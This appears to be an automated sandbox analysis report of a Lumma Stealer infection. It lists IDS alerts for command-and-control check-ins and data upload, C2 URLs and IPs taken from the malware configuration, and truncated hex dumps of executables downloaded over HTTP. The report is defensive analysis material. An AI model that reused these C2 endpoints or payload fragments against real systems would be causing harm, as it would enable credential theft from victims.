Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50018 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50050 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49949 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50047 -> 104.21.53.8:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:09 GMTETag: "2d8200-624bfbe479d49"Accept-Ranges: bytesContent-Length: 2982400Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 00 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 31 00 00 04 00 00 a9 c1 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 66 6d 63 61 63 63 66 00 f0 2a 00 00 00 06 00 00 ec 2a 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 72 6c 73 7a 6c 65 79 00 10 00 00 00 f0 30 00 00 04 00 00 00 5c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 31 00 00 22 00 00 00 60 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:16 GMTETag: "1cb800-624bfbeaba684"Accept-Ranges: bytesContent-Length: 1882112Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 6b 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 6b 00 00 04 00 00 6d 97 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 76 67 68 76 61 74 00 60 1a 00 00 e0 50 00 00 56 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 63 69 72 75 75 69 77 00 10 00 00 00 40 6b 00 00 04 00 00 00 92 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 6b 00 00 22 00 00 00 96 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:26 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:10:20 GMTETag: "1a8c00-624bf2fe2133d"Accept-Ranges: bytesContent-Length: 1739776Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 45 00 00 04 00 00 2b 2d 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 a0 00 00 00 02 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6e 68 62 67 69 72 79 00 40 1a 00 00 80 2a 00 00 2a 1a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 64 63 6f 76 64 76 73 00 20 00 00 00 c0 44 00 00 04 00 00 00 66 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 44 00 00 22 00 00 00 6a 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 18 Oct 2024 13:04:37 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:53 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:16 GMTETag: "1cb800-624bfbeaba684"Accept-Ranges: bytesContent-Length: 1882112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 6b 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 6b 00 00 04 00 00 6d 97 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 76 67 68 76 61 74 00 60 1a 00 00 e0 50 00 00 56 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 63 69 72 75 75 69 77 00 10 00 00 00 40 6b 00 00 04 00 00 00 92 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 6b 00 00 22 00 00 00 96 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:23 GMTETag: "1c7c00-624bfbf1b199a"Accept-Ranges: bytesContent-Length: 1866752Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 00 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4a 00 00 04 00 00 93 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 ee 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 ed 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6a 6b 6f 65 66 72 6b 00 60 19 00 00 90 30 00 00 60 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6b 73 70 77 6e 70 69 00 10 00 00 00 f0 49 00 00 06 00 00 00 54 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4a 00 00 22 00 00 00 5a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:09:55 GMTETag: "e1400-624bf2e602712"Accept-Ranges: bytesContent-Length: 922624Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0b 50 12 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 e2 79 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 a9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 a9 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 